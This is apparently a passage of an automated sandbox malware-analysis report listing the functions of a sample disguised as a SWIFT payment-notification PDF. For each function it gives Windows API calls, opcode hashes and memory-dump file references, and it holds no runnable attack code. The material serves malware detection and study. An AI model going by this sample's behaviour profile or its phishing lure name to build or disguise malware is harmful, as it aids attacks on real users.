                                                                                                                              • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                                              • Opcode Fuzzy Hash: e11f4cdbd8b178bb717da899e9b466e6e84e140d5ce5b896a0b9345fcfa3a66e
                                                                                                                              • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                                              APIs
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                              • API String ID: 3207048006-625585964
                                                                                                                              • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                              • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                                              • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                              • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b9df760e9e2a25fddf0fa7204478e4c9f818c9e6a35bd20437ea9acb74762ab8
                                                                                                                              • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                                              • Opcode Fuzzy Hash: b9df760e9e2a25fddf0fa7204478e4c9f818c9e6a35bd20437ea9acb74762ab8
                                                                                                                              • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                                              APIs
                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                                              • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                                              • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                                              • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1457242333-0
                                                                                                                              • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                              • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                                              • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                              • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                                              APIs
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ConnectRegistry
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 76216097-0
                                                                                                                              • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                              • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                                              • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                              • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                              • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                                              • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                                              • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                                              • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                                              • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                                              • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                                              • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4082120231-0
                                                                                                                              • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                              • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                                              • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                              • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                                              APIs
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                                              • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$ConnectEnumOpenRegistryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1413298697-0
                                                                                                                              • Opcode ID: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                                                                                                              • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                                              • Opcode Fuzzy Hash: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                                                                                                              • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                                              APIs
                                                                                                                              • GetStartupInfoW.KERNEL32(?), ref: 0041AAAE
                                                                                                                                • Part of subcall function 00416B49: Sleep.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00416B71
                                                                                                                              • GetFileType.KERNEL32(?), ref: 0041ABE1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileInfoSleepStartupType
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1527402494-0
                                                                                                                              • Opcode ID: f5ad439157debf0731eb09ee09d84389162392039795a7b6791dab7457716719
                                                                                                                              • Instruction ID: 02b76c019d8a3bae1def7e59c842a1f1d399f548cc34b69872dea7f72cfbe790
                                                                                                                              • Opcode Fuzzy Hash: f5ad439157debf0731eb09ee09d84389162392039795a7b6791dab7457716719
                                                                                                                              • Instruction Fuzzy Hash: DB6109715063418FD710CF28D98869A7BA1BF06324F244A6ED566CB3E1E738D895C78E
                                                                                                                              APIs
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0045DCAF
                                                                                                                              • SHGetMalloc.SHELL32(?), ref: 0045DCB9
                                                                                                                              • CoUninitialize.OLE32 ref: 0045DCC3
                                                                                                                              • SHGetDesktopFolder.SHELL32(00000000,?), ref: 0045DD62
                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0045DE0E
                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0045DE30
                                                                                                                              • CoUninitialize.OLE32 ref: 0045DE7E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2470771137-0
                                                                                                                              • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                              • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                                              • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                              • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                                              APIs
                                                                                                                              • GetParent.USER32(?), ref: 0044443B
                                                                                                                              • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                                              • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 87235514-0
                                                                                                                              • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                              • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                                              • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                              • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                                              APIs
                                                                                                                              • GetParent.USER32(?), ref: 00444633
                                                                                                                              • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                                              • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                                              • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                                              • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                                              • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                                              • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 87235514-0
                                                                                                                              • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                              • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                                              • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                              • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                                              • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                                              • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2354583917-0
                                                                                                                              • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                              • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                                              • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                              • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                              • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                                              • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                              • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                                              APIs
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
